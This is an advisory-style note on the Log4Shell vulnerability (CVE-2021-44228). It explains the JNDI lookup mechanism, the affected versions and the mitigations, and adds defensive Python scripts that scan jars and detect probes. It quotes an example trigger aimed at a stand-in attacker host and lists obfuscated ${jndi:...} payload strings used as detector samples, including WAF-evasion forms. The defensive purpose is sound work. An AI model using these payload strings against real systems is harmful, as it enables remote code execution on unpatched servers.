log4j trivial RCE (similar to ShellShock) - "Log4Shell" CVE-2021-44228
Summary (Dan Goodin): Log4j takes a log message, interprets it as a URL and goes out and fetches it. It will even execute JavaScript in URLs with full privileges of the main program. Exploits are triggered inside log messages using the ${} syntax. Easy peasy.

Mechanism, more precisely: a logged string such as ${jndi:ldap://attacker.example/a} makes Log4j perform a JNDI lookup; the attacker-controlled LDAP or RMI server answers with a reference to a Java class (or a serialized object), which the JVM loads and runs with the full privileges of the logging process. Any attacker-controlled string that ends up in a log message (User-Agent, a login name, a chat message, a search query) is a trigger.

Who is affected:
- Servers and clients that run Java and also log anything using the log4j framework
- log4j 2.x confirmed (2.0-beta9 through 2.14.1); log4j 1.x has no message lookups and is not affected by this CVE
- Don't forget appliances that use Java server components
- Downstream projects that include log4j, including Apache Struts, Solr, etc.

Required to fully mitigate:
- Upgrade to Log4j 2.15.0 (requires Java 8)

Exploitation: active

Mitigations - easiest:
- (@MalwareTechBlog): If you can't upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).

Mitigations - official project itself (https://logging.apache.org/log4j/2.x/):
>Users of Log4j 2.10 or greater may add -Dlog4j.formatMsgNoLookups=true as a command line option or add log4j.formatMsgNoLookups=true to a log4j2.component.properties file on the classpath to prevent lookups in log event messages.
>Users since Log4j 2.7 may specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages.
>Remove the JndiLookup and JndiManager classes from the log4j-core jar. Removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.
Note the property spelling: the system property Log4j actually reads is log4j2.formatMsgNoLookups (with the "2", as in the @MalwareTechBlog tweet); the same setting can be supplied as the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS. That flag only exists in 2.10 and later; on 2.7 to 2.9 use %m{nolookups}, and on anything older remove JndiLookup.class from the jar or upgrade. Whichever you pick, verify it on a running instance by logging a harmless lookup such as ${java:version} and checking that it comes out unexpanded.

Mitigations - harder:
- WAF to limit exploit queries (attackers hide the ${jndi:...} string behind nested lookups such as ${${lower:j}ndi:...}, so signature matching is a speed bump, not a fix)
- egress filtering to block unexpected outbound traffic (the JVM has to reach the attacker's LDAP/RMI server and class host; without egress there is no second stage, though the lookup itself still happens)

Exploit detection:

Good threads and summaries:
- https://cert.at/de/warnungen/2021/12/kritische-0-day-sicherheitslucke-in-apache-log4j-bibliothek (German)

-- Royce Williams, Tech Solvency
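Worked example for the "remove the JndiLookup class from the jar" mitigation and for checking what is installed: an added script, not code from this note or from the Log4j project. It walks a directory tree for jars, reads the version from the jar manifest (falling back to the Maven pom.properties), reports whether JndiLookup.class and JndiManager.class are present, classifies each jar against the 2.15.0 upgrade target, and rewrites a jar without JndiLookup.class (the same effect as `zip -q -d <jar> org/apache/logging/log4j/core/lookup/JndiLookup.class`). The fixture it runs against is constructed in a temp directory: a fake log4j-core-2.14.1.jar with empty placeholder class entries, not a real Log4j build.

```python
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JNDI_MANAGER = "org/apache/logging/log4j/core/net/JndiManager.class"
FIXED = (2, 15, 0)  # the version this note says to upgrade to

def _vtuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Suffixes are ignored."""
    nums = []
    for part in re.split(r"[.\-]", version):
        if not part.isdigit():
            break
        nums.append(int(part))
    return tuple(nums)

def _read_version(z, names):
    """Version from the manifest, else from the Maven pom.properties, else None."""
    if "META-INF/MANIFEST.MF" in names:
        text = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
        if m:
            return m.group(1)
    pom = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
    if pom in names:
        m = re.search(r"^version=(\S+)", z.read(pom).decode("utf-8", "replace"), re.M)
        if m:
            return m.group(1)
    return None

def assess(path):
    """Classify one jar: patched (>= 2.15.0), mitigated (no JndiLookup), or vulnerable."""
    with zipfile.ZipFile(path) as z:
        names = set(z.namelist())
        version = _read_version(z, names)
    has_lookup = JNDI_LOOKUP in names
    if version and _vtuple(version) >= FIXED:
        status = "patched"
    elif not has_lookup:
        status = "mitigated"
    else:
        status = "vulnerable"
    return {"path": path, "version": version, "has_jndi_lookup": has_lookup,
            "has_jndi_manager": JNDI_MANAGER in names, "status": status}

def scan(root):
    """Every jar under root that is log4j-core by name or ships JndiLookup.class
    (the second test catches shaded/fat jars that embed log4j under another name)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if not f.endswith(".jar"):
                continue
            path = os.path.join(dirpath, f)
            try:
                report = assess(path)
            except zipfile.BadZipFile:
                continue
            if f.startswith("log4j-core") or report["has_jndi_lookup"]:
                found.append(report)
    return found

def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class. Returns True if the entry was removed."""
    tmp = path + ".tmp"
    removed = False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_LOOKUP:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))  # keeps each entry's own compression
    os.replace(tmp, path)
    return removed

def make_fixture(root):
    """Constructed fixture, not a real Log4j build: a fake log4j-core-2.14.1.jar
    with placeholder class entries and a manifest, plus an unrelated jar."""
    lib = os.path.join(root, "app", "WEB-INF", "lib")
    os.makedirs(lib, exist_ok=True)
    jar = os.path.join(lib, "log4j-core-2.14.1.jar")
    with zipfile.ZipFile(jar, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nImplementation-Version: 2.14.1\n")
        z.writestr(JNDI_LOOKUP, b"")
        z.writestr(JNDI_MANAGER, b"")
    with zipfile.ZipFile(os.path.join(lib, "commons-io-2.11.0.jar"), "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return jar

def demo():
    """Assess the fixture, apply the class-removal mitigation, assess again."""
    with tempfile.TemporaryDirectory() as root:
        jar = make_fixture(root)
        before = scan(root)
        removed = strip_jndi_lookup(jar)
        after = scan(root)
    return before, removed, after

if __name__ == "__main__":
    before, removed, after = demo()
    for r in before + after:
        print(r["status"], r["version"], os.path.basename(r["path"]),
              "JndiLookup present" if r["has_jndi_lookup"] else "JndiLookup absent")
```

Point `scan()` at a real deployment root (Tomcat `webapps`, an application's `lib`, an appliance's unpacked firmware) and it reports every log4j-core jar it finds. Removing the class is the note's last-resort option: the jar still has to be redeployed and the JVM restarted, JndiManager stays behind unless you remove it too (which breaks JndiContextSelector and JMSAppender, as the project quote says), and a vendor's next update will put the class back.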
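For the "Exploit detection" heading above, an added example (mine, not from this note or from Log4j): a detector for ${jndi:...} probes in access-log lines that first URL-decodes the line and then collapses the nested-lookup obfuscation seen in the wild (${lower:...}, ${upper:...} and the ":-" default-value trick such as ${::-j}), innermost first, the way Log4j's own substitution does. Unknown lookup types (jndi, env, sys, date) are left in place, so a normalized line still shows what the logger would have tried to resolve. The log lines are constructed samples; 203.0.113.9 is a documentation address standing in for an attacker's LDAP/RMI host.

```python
import re
from urllib.parse import unquote

# Innermost ${...} that contains no further "${"; resolved first, as Log4j's
# StrSubstitutor does, so ${${lower:j}ndi:...} collapses to ${jndi:...}.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Log4j lowercases the lookup prefix before dispatch, so ${JNDI:...} is live too.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def _resolve(m):
    """Resolve one innermost lookup as Log4j would, or fence it off as unresolvable."""
    body = m.group(1)
    if ":-" in body:                          # ${env:NOPE:-j} and ${::-j} -> "j"
        return body.split(":-", 1)[1]
    kind, sep, value = body.partition(":")
    if sep and kind.lower() == "lower":       # ${lower:J} -> "j"
        return value.lower()
    if sep and kind.lower() == "upper":       # ${upper:j} -> "J"
        return value.upper()
    # Unknown lookup (jndi, env, sys, date, ...): keep it, but wrap it in private
    # marker bytes so the next round does not match the same span forever.
    return "\x01" + body + "\x02"

def normalize(line):
    """URL-decode, then collapse nested lookups innermost-first, bounded."""
    s = unquote(unquote(line))                # twice: catches %2524%257B double encoding
    for _ in range(20):                       # bound the work on adversarial input
        collapsed = _INNER.sub(_resolve, s)
        if collapsed == s:
            break
        s = collapsed
    return s.replace("\x01", "${").replace("\x02", "}")

def is_log4shell_probe(line):
    return _JNDI.search(normalize(line)) is not None

def scan(lines):
    """(index, normalized line) for every line carrying a JNDI lookup after de-obfuscation."""
    hits = []
    for i, line in enumerate(lines):
        n = normalize(line)
        if _JNDI.search(n):
            hits.append((i, n))
    return hits

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fy%7D HTTP/1.1" 400 "-"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/z}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "${env:HOME} is not an exploit"',
]

if __name__ == "__main__":
    for i, n in scan(SAMPLE_LOG):
        print(f"line {i}: {n}")
```

Run it over web-server access logs, application logs and anything else that records untrusted input; a hit only tells you a probe arrived, not that it worked, so pair it with the egress side: DNS or outbound LDAP/RMI connections from the JVM to the host named in the lookup are the confirmation. The marker approach is deliberate: a naive "find ${jndi:" check misses every obfuscated form, and a naive "resolve until nothing changes" loop never terminates on a lookup it cannot resolve.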